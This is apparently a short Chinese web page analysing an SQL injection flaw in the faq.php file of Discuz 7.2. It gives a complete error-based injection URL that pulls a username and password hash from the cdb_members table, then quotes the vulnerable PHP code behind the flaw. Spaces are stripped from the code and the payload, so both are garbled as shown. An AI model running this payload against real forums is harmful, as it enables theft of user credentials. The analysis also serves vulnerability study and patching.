Discuz7.2版的faq.php SQL注入漏洞分析
注入代码实例:
https://www.nhooo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and(select1from(selectcount(*),concat((select(select(selectconcat(username,0x20,password)fromcdb_memberslimit0,1))from`information_schema`.tableslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23
漏洞分析:byphithon
($action=='grouppermission'){
... ksort($gids); $groupids=array(); foreach($gidsas$row){ $groupids[]=$row[0]; }
$query=$db->query("SELECT*FROM{$tablepre}usergroupsuLEFTJOIN{$tablepre}admingroupsaONu.groupid=a.admingidWHEREu.groupidIN(".implodeids($groupids).")"); ... } functionimplodeids($array){ if(!empty($array)){ return"'".implode("','",is_array($array)?$array:array($array))."'"; }else{ return''; } }
热门推荐
10 单位生日庆祝祝福语简短
11 生物老师英语祝福语简短
12 工作祝福语男士大全简短
13 产品祝福语女生文案简短
14 接亲新婚祝福语大全简短
15 团体年会祝福语简短霸气
16 免费生日祝福语简短独特
17 桔梗配什么祝福语简短
18 阳光帅气生日祝福语简短